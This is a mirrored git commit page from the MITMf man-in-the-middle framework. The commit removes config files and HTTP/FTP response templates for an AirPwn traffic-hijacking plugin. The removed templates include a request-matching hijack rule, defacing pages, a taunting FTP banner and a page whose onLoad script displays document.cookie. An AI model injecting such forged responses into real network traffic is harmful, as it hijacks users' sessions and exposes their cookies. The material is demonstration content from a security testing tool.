mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-11 07:37:11 -07:00
removed airpwn config files
This commit is contained in:
parent
c223ff18f7
commit
a4e8869fc6
8 changed files with 0 additions and 57 deletions
|
@ -1,6 +0,0 @@
|
|||
#Example config for the AirPwn plugin
|
||||
|
||||
[site_hijack]
|
||||
match = ^(GET|POST).*
|
||||
ignore = (^GET [^ ?]+\.(?:jpg|jpeg|gif|png|ico|css)|(?:host: .*google.com))
|
||||
response = ./config_files/airpwn_templates/site_hijack
|
|
@ -1,10 +0,0 @@
|
|||
HTTP/1.1 200 OK
|
||||
Content-type: text/css
|
||||
Content-length: 103
|
||||
|
||||
body {
|
||||
background-color: red;
|
||||
background-image: url(/airpwnbg.jpg);
|
||||
background-repeat: repeat;
|
||||
}
|
||||
|
Binary file not shown.
|
@ -1,2 +0,0 @@
|
|||
331 FTP IS FUN!!!! ENJOY YOUR DATA!!!
|
||||
|
|
@ -1,11 +0,0 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
<html><head><title>HELLO DEFCON!</title>
|
||||
</head><body>
|
||||
<blink><font size=+5 color=red>
|
||||
Hello Defcon! Your wireless network is delicious!
|
||||
</font>
|
||||
</blink>
|
||||
<p>
|
|
@ -1,13 +0,0 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
<html><head><title>pwned</title>
|
||||
</head><body onLoad="
|
||||
alert('hi');
|
||||
alert('you');
|
||||
alert('are');
|
||||
alert('so');
|
||||
alert('owned');
|
||||
alert('cookie: ' + document.cookie);">
|
||||
|
Binary file not shown.
|
@ -1,15 +0,0 @@
|
|||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
Content-Length: 250
|
||||
|
||||
<html>
|
||||
<head><title>hugs</title></head>
|
||||
<body>
|
||||
<iframe frameborder=0 border=0 src="http://google.com" width="100%"
|
||||
height="100%">hugs</iframe>
|
||||
<div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
|
||||
BYE BYE!
|
||||
|
||||
|
||||
<!--
|
Loading…
Add table
Add a link
Reference in a new issue